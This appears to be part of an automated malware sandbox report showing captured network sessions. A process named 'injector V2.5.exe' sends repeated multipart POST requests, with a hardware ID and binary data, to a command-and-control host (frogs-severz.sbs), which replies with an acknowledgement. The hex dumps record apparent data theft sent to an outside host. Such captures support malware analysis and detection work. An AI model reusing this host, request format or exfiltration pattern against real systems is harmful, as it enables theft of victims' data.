                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 33 65 30 39 0d 0a 51 6f 7a 59 6e 77 70 4e 2f 41 50 37 33 52 59 76 63 49 54 71 71 74 34 31 61 2b 70 42 50 48 74 56 37 63 55 72 36 72 38 4c 4a 2f 56 53 49 4e 6a 6a 5a 6b 48 30 44 74 73 35 49 6c 39 38 73 4b 65 53 6b 78 6b 79 36 6c 6b 4a 51 68 7a 41 36 41 72 61 6b 32 6f 2b 33 47 71 67 70 49 74 6d 65 65 42 62 34 39 55 4b 55 33 69 34 74 6f 4c 75 61 56 50 2b 57 51 42 33 4e 64 58 46 4b 2b 71 2f 43 79 66 31 55 6e 51 38 76 32 34 74 78 55 4d 48 34 52 5a 66 57 50 58 2b 37 39 5a 45 56 2f 5a 30 4f 53 4a 39 7a 50 51 6d 7a 72 64 57 62 72 78 69 6d 4b 53 2f 43 6b 33 77 54 2b 76 52 41 6c 64 51 35 4e 4b 75 7a 68 31 54 33 6e 45 55 55 33 7a 42 2f 52 4c 32 77 6d 74 48 6c 4e 61 6f 30 4f 73 69 4c 4e 43 66 33 39 55 57 65 78 32 73 67 36 71 4c 49 55 76 62 52 46 6c 44 65 66 44 30 46
                                                                        Data Ascii: 3e09QozYnwpN/AP73RYvcITqqt41a+pBPHtV7cUr6r8LJ/VSINjjZkH0Dts5Il98sKeSkxky6lkJQhzA6Arak2o+3GqgpItmeeBb49UKU3i4toLuaVP+WQB3NdXFK+q/Cyf1UnQ8v24txUMH4RZfWPX+79ZEV/Z0OSJ9zPQmzrdWbrximKS/Ck3wT+vRAldQ5NKuzh1T3nEUU3zB/RL2wmtHlNao0OsiLNCf39UWex2sg6qLIUvbRFlDefD0F
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 4b 69 48 36 77 2f 4c 4d 75 58 66 52 7a 36 38 6b 65 52 33 53 77 74 71 62 36 41 58 2f 4f 55 51 68 33 63 59 6a 49 46 2b 75 61 61 6a 72 31 55 2f 33 73 50 2b 4b 31 56 55 75 75 31 55 74 6e 57 4a 33 2f 38 2b 34 6c 64 2f 5a 39 4b 41 74 46 69 50 77 4f 36 72 74 4b 42 6f 68 69 70 4e 54 72 44 6d 33 59 63 2b 2f 4e 43 6e 64 41 76 4f 36 69 38 79 42 75 36 6c 6c 5a 51 68 7a 41 5a 42 36 43 79 6d 4b 65 75 46 4b 41 72 50 74 44 61 61 56 7a 74 75 30 79 56 6b 58 4e 2f 6f 4c 43 43 58 50 6d 59 53 68 33 66 65 54 34 4e 73 71 58 53 6d 36 51 65 74 54 38 74 79 70 56 38 46 76 7a 33 52 4a 58 56 4f 54 54 6b 39 63 68 53 34 74 45 57 55 50 39 37 4a 79 65 6f 75 70 71 57 36 77 33 6e 50 43 53 4c 77 6a 59 62 2b 50 70 4b 6b 39 63 67 4f 71 6d 37 6a 56 2f 39 6e 55 34 51 33 48 59 33 43 62 4b 67 31
                                                                        Data Ascii: KiH6w/LMuXfRz68keR3Swtqb6AX/OUQh3cYjIF+uaajr1U/3sP+K1VUuu1UtnWJ3/8+4ld/Z9KAtFiPwO6rtKBohipNTrDm3Yc+/NCndAvO6i8yBu6llZQhzAZB6CymKeuFKArPtDaaVztu0yVkXN/oLCCXPmYSh3feT4NsqXSm6QetT8typV8Fvz3RJXVOTTk9chS4tEWUP97JyeoupqW6w3nPCSLwjYb+PpKk9cgOqm7jV/9nU4Q3HY3CbKg1
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 6f 50 69 44 41 6e 48 67 54 38 76 64 47 32 5a 39 72 4f 4c 7a 37 30 42 58 64 69 30 4d 57 79 47 45 45 41 37 72 35 6d 70 62 72 44 65 63 38 4a 49 76 43 4e 68 2f 34 38 55 61 63 31 53 4d 34 70 37 71 45 55 66 65 63 53 68 6e 62 64 53 4d 57 76 4b 62 61 68 71 73 62 71 79 6b 6d 7a 70 70 36 55 72 71 37 54 49 47 52 63 33 2b 56 72 49 67 56 35 64 39 58 55 4e 68 38 63 56 7a 36 70 39 65 62 71 52 75 6e 4f 69 76 50 6b 58 45 55 38 76 70 49 6e 4e 49 75 4f 61 57 37 68 46 2f 39 6d 55 51 65 30 6e 59 31 41 72 7a 6f 6c 4d 6d 69 44 4f 64 6a 61 50 6d 58 65 42 76 33 2f 55 61 50 2b 52 70 2f 75 2f 57 52 46 66 32 64 44 6b 69 66 64 44 6f 4d 74 71 33 53 6a 4b 51 63 72 54 4d 6e 78 49 68 33 48 66 33 38 51 4a 54 65 4a 54 71 71 71 59 39 65 38 5a 6c 48 48 74 6b 77 66 30 53 39 73 4a 72 52 35 53
                                                                        Data Ascii: oPiDAnHgT8vdG2Z9rOLz70BXdi0MWyGEEA7r5mpbrDec8JIvCNh/48Uac1SM4p7qEUfecShnbdSMWvKbahqsbqykmzpp6Urq7TIGRc3+VrIgV5d9XUNh8cVz6p9ebqRunOivPkXEU8vpInNIuOaW7hF/9mUQe0nY1ArzolMmiDOdjaPmXeBv3/UaP+Rp/u/WRFf2dDkifdDoMtq3SjKQcrTMnxIh3Hf38QJTeJTqqqY9e8ZlHHtkwf0S9sJrR5S
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 7a 4a 4a 79 48 4f 62 36 52 4e 6d 66 61 7a 69 38 2b 39 41 56 79 34 64 4a 46 39 41 79 47 41 4f 68 71 64 43 4b 72 68 6a 6e 4a 47 62 53 32 6e 45 65 74 4b 4d 4c 6c 4e 30 6d 4f 37 61 33 69 46 58 7a 6c 6b 51 43 30 48 38 38 42 37 71 74 79 49 69 33 47 36 77 2b 4b 38 2b 56 65 52 37 38 38 51 76 58 6b 53 77 6e 35 4f 50 49 65 66 6d 41 52 46 4c 34 61 69 63 44 74 72 6e 52 68 4b 6c 55 75 48 55 78 69 35 31 36 55 71 79 37 53 35 6a 63 4f 54 71 6c 73 59 4a 59 38 70 35 4c 46 64 42 30 4e 51 2b 30 75 74 53 47 70 52 4b 73 4f 69 33 49 6b 58 77 63 2f 65 6b 4c 31 35 45 73 4a 2b 54 6a 79 48 2f 68 6b 45 4d 63 6e 56 34 36 45 72 33 71 2b 34 65 75 45 36 73 74 61 4e 54 55 62 31 4c 7a 39 77 76 42 6b 53 49 78 71 4c 69 50 58 66 4b 55 54 68 76 66 66 7a 73 4b 76 62 72 51 68 61 38 47 71 44 67
                                                                        Data Ascii: zJJyHOb6RNmfazi8+9AVy4dJF9AyGAOhqdCKrhjnJGbS2nEetKMLlN0mO7a3iFXzlkQC0H88B7qtyIi3G6w+K8+VeR788QvXkSwn5OPIefmARFL4aicDtrnRhKlUuHUxi516Uqy7S5jcOTqlsYJY8p5LFdB0NQ+0utSGpRKsOi3IkXwc/ekL15EsJ+TjyH/hkEMcnV46Er3q+4euE6staNTUb1Lz9wvBkSIxqLiPXfKUThvffzsKvbrQha8GqDg
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 56 7a 74 75 30 79 56 6b 58 4e 2f 70 4c 2b 45 56 76 32 66 51 52 33 51 64 7a 6f 4c 73 4b 62 49 68 71 41 63 71 7a 4d 6c 32 5a 42 38 41 50 33 79 52 70 66 5a 4f 54 7a 6b 39 63 68 53 34 74 45 57 55 4f 31 36 4d 67 69 73 70 64 58 4a 75 6c 71 2b 65 79 2f 48 32 69 35 53 35 75 6c 4c 6b 74 45 73 4d 62 61 36 67 46 72 77 6b 55 67 62 31 58 4d 34 41 4c 53 68 33 49 69 6f 46 61 59 37 4c 63 75 54 5a 42 2b 30 74 51 75 65 79 57 74 6e 35 49 79 45 58 73 75 53 57 46 44 41 50 69 68 45 76 61 53 61 30 65 55 56 74 54 59 67 7a 35 70 37 46 50 2f 36 53 70 72 52 4b 7a 79 6b 76 6f 4e 61 2f 4a 5a 44 47 74 5a 35 49 77 79 2b 75 74 71 46 6f 56 54 70 65 79 2f 54 32 69 35 53 78 50 68 41 6c 64 45 6d 4b 75 53 6b 78 6b 79 36 6c 6b 4a 51 68 7a 41 35 44 37 47 75 30 59 71 6d 47 71 77 78 4a 38 53 51
                                                                        Data Ascii: Vztu0yVkXN/pL+EVv2fQR3QdzoLsKbIhqAcqzMl2ZB8AP3yRpfZOTzk9chS4tEWUO16MgispdXJulq+ey/H2i5S5ulLktEsMba6gFrwkUgb1XM4ALSh3IioFaY7LcuTZB+0tQueyWtn5IyEXsuSWFDAPihEvaSa0eUVtTYgz5p7FP/6SprRKzykvoNa/JZDGtZ5Iwy+utqFoVTpey/T2i5SxPhAldEmKuSkxky6lkJQhzA5D7Gu0YqmGqwxJ8SQ
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 64 64 31 64 55 35 66 2b 72 37 6d 56 37 31 67 30 41 58 6b 47 45 6e 43 61 71 72 33 34 37 70 48 4c 59 32 4a 49 76 55 4e 67 66 2f 39 30 32 55 78 47 51 75 73 72 69 65 55 72 61 5a 58 78 33 54 4d 41 35 4b 2b 72 43 61 30 65 55 68 70 44 55 6d 7a 49 78 6e 58 39 54 77 52 35 72 64 4b 6a 6a 6b 39 63 68 54 75 73 6b 64 58 70 39 30 49 45 54 69 2b 49 6a 53 38 45 66 77 61 33 72 55 31 47 39 53 34 72 73 54 79 35 39 72 4c 65 54 6a 79 42 4c 35 67 31 77 57 33 47 59 79 51 34 53 57 32 34 53 71 57 4b 6b 77 4b 4d 79 4b 59 41 6d 34 38 30 69 44 79 78 55 42 6a 37 65 4f 55 75 43 57 53 44 62 2f 4d 48 39 45 74 65 69 43 73 4f 56 63 35 77 52 6d 69 34 49 32 53 72 54 4f 53 4a 66 66 4c 43 6d 31 39 71 42 32 77 4b 73 4d 50 4e 68 6c 63 7a 43 39 75 4d 75 43 71 42 6a 6e 64 57 6a 4e 32 69 35 43 75
                                                                        Data Ascii: dd1dU5f+r7mV71g0AXkGEnCaqr347pHLY2JIvUNgf/902UxGQusrieUraZXx3TMA5K+rCa0eUhpDUmzIxnX9TwR5rdKjjk9chTuskdXp90IETi+IjS8Efwa3rU1G9S4rsTy59rLeTjyBL5g1wW3GYyQ4SW24SqWKkwKMyKYAm480iDyxUBj7eOUuCWSDb/MH9EteiCsOVc5wRmi4I2SrTOSJffLCm19qB2wKsMPNhlczC9uMuCqBjndWjN2i5Cu
                                                                        2024-11-23 13:17:36 UTC1369INData Raw: 4c 4c 48 2f 71 2b 34 59 56 6f 74 46 50 47 73 39 39 50 67 50 32 72 74 53 48 35 51 76 70 49 6d 6a 64 32 69 35 42 75 72 74 5a 32 59 6c 72 65 4b 71 32 69 56 62 30 6b 6c 77 43 32 58 4d 6e 42 2f 32 57 35 4b 79 6f 47 61 49 31 4c 2f 57 6b 56 78 6a 6b 39 6b 53 65 6b 77 73 34 73 72 69 32 61 38 32 41 53 51 43 64 56 6a 49 53 75 65 69 55 79 62 31 55 2f 33 73 4a 77 59 70 37 48 66 4f 35 61 35 37 48 4b 48 2f 71 2b 34 77 56 6f 74 46 72 48 64 4a 31 50 77 50 34 69 64 43 5a 71 42 75 67 65 51 6a 4d 6a 48 56 53 75 72 74 48 32 59 6c 72 50 71 36 72 68 56 72 39 33 55 6b 4b 32 44 42 2f 52 4c 54 6f 67 73 6d 6b 48 72 63 32 4a 38 7a 57 63 42 7a 36 75 31 54 58 79 47 73 70 35 4f 50 62 47 37 71 44 44 6b 69 66 4e 7a 49 57 71 4b 37 5a 6e 36 5a 54 6d 51 55 46 32 5a 31 6d 45 62 62 4b 52 70
                                                                        Data Ascii: LLH/q+4YVotFPGs99PgP2rtSH5QvpImjd2i5BurtZ2YlreKq2iVb0klwC2XMnB/2W5KyoGaI1L/WkVxjk9kSekws4sri2a82ASQCdVjISueiUyb1U/3sJwYp7HfO5a57HKH/q+4wVotFrHdJ1PwP4idCZqBugeQjMjHVSurtH2YlrPq6rhVr93UkK2DB/RLTogsmkHrc2J8zWcBz6u1TXyGsp5OPbG7qDDkifNzIWqK7Zn6ZTmQUF2Z1mEbbKRp


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449733104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:38 UTC272OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=WMPPQDEM
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 18110
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:38 UTC15331OUTData Raw: 2d 2d 57 4d 50 50 51 44 45 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 57 4d 50 50 51 44 45 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4d 50 50 51 44 45 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 0d 0a 2d 2d 57 4d 50 50 51 44 45 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                        Data Ascii: --WMPPQDEMContent-Disposition: form-data; name="hwid"E8521D1DD42FF4D4FF1C6333321FCDD9--WMPPQDEMContent-Disposition: form-data; name="pid"2--WMPPQDEMContent-Disposition: form-data; name="lid"HpOoIh--b701621bcd05--WMPPQDEMContent-D
                                                                        2024-11-23 13:17:38 UTC2779OUTData Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
                                                                        Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                        2024-11-23 13:17:38 UTC1007INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=0u19kpvss9ned2544vrcdfmndo; expires=Wed, 19-Mar-2025 07:04:17 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trRrkiaNBEp692dRuPm9wu5kWcvDRjXRhpiDhqPlkQcnEaqmx3M5Qwii7ATkhSZepTxXh4IDRJunsAF5zy3JcWWtG2%2FSJ7O4piKmy2Btzuer9ZEbbiJImLRVWHDMQKzlsVMG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170c9d825436a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19062&delivery_rate=1723730&cwnd=176&unsent_bytes=0&cid=d15605165b519eb9&ts=877&x=0"
                                                                        2024-11-23 13:17:38 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 13:17:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449734104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:40 UTC281OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=GQRL7OYO3CXCHC5RQ4
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8791
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:40 UTC8791OUTData Raw: 2d 2d 47 51 52 4c 37 4f 59 4f 33 43 58 43 48 43 35 52 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 47 51 52 4c 37 4f 59 4f 33 43 58 43 48 43 35 52 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 51 52 4c 37 4f 59 4f 33 43 58 43 48 43 35 52 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36
                                                                        Data Ascii: --GQRL7OYO3CXCHC5RQ4Content-Disposition: form-data; name="hwid"E8521D1DD42FF4D4FF1C6333321FCDD9--GQRL7OYO3CXCHC5RQ4Content-Disposition: form-data; name="pid"2--GQRL7OYO3CXCHC5RQ4Content-Disposition: form-data; name="lid"HpOoIh--b7016
                                                                        2024-11-23 13:17:41 UTC1008INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=6d6cmndklrv8jf7ieshok43agi; expires=Wed, 19-Mar-2025 07:04:20 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRmvhyTbxzoHQeaFNqZc6h7g%2FmCz7nw3ncN2lamyrQ9ySsbVY9JConrz%2BGVq2jXdH6JDmKb8HtUJGDWbj8OVmJpynMleIpzRx6h2mj4JIOeaxjYPto3hHy9HkPMO2%2Be3i5jH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170d9ce92efa7-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1928&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9730&delivery_rate=1482986&cwnd=56&unsent_bytes=0&cid=e4cd145dc35f0b2a&ts=860&x=0"
                                                                        2024-11-23 13:17:41 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 13:17:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449735104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:43 UTC274OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=L77GLR83TI
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20396
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:43 UTC15331OUTData Raw: 2d 2d 4c 37 37 47 4c 52 38 33 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 4c 37 37 47 4c 52 38 33 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 37 37 47 4c 52 38 33 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 0d 0a 2d 2d 4c 37 37 47 4c 52 38 33 54 49 0d 0a 43
                                                                        Data Ascii: --L77GLR83TIContent-Disposition: form-data; name="hwid"E8521D1DD42FF4D4FF1C6333321FCDD9--L77GLR83TIContent-Disposition: form-data; name="pid"3--L77GLR83TIContent-Disposition: form-data; name="lid"HpOoIh--b701621bcd05--L77GLR83TIC
                                                                        2024-11-23 13:17:43 UTC5065OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40
                                                                        Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                        2024-11-23 13:17:44 UTC1013INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=jbcc089jfiuuru81tcpr1dnf0t; expires=Wed, 19-Mar-2025 07:04:22 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CW432t9dcWOVfvl55ODmU8%2BfE5W%2F5Ii2KxgwZfS9lb90xzp8jx79gvNcak%2B1CFLFA1tH1AQqgZAm0OCXw5P4PDMED3XUkkD4TBnMVbeHLanpwiXqd%2Bf25tsy6xbNLGC8ZH6k"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170eb9c9f4368-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1745&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21350&delivery_rate=1504379&cwnd=231&unsent_bytes=0&cid=64505670ec3d9eba&ts=763&x=0"
                                                                        2024-11-23 13:17:44 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 13:17:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449736104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:45 UTC279OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=HDOQ1XHNTVIKDHFR
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1261
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:45 UTC1261OUTData Raw: 2d 2d 48 44 4f 51 31 58 48 4e 54 56 49 4b 44 48 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 48 44 4f 51 31 58 48 4e 54 56 49 4b 44 48 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 44 4f 51 31 58 48 4e 54 56 49 4b 44 48 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30
                                                                        Data Ascii: --HDOQ1XHNTVIKDHFRContent-Disposition: form-data; name="hwid"E8521D1DD42FF4D4FF1C6333321FCDD9--HDOQ1XHNTVIKDHFRContent-Disposition: form-data; name="pid"1--HDOQ1XHNTVIKDHFRContent-Disposition: form-data; name="lid"HpOoIh--b701621bcd0
                                                                        2024-11-23 13:17:46 UTC1018INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=puksl3vj1dvirlhsbakinca1bg; expires=Wed, 19-Mar-2025 07:04:25 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
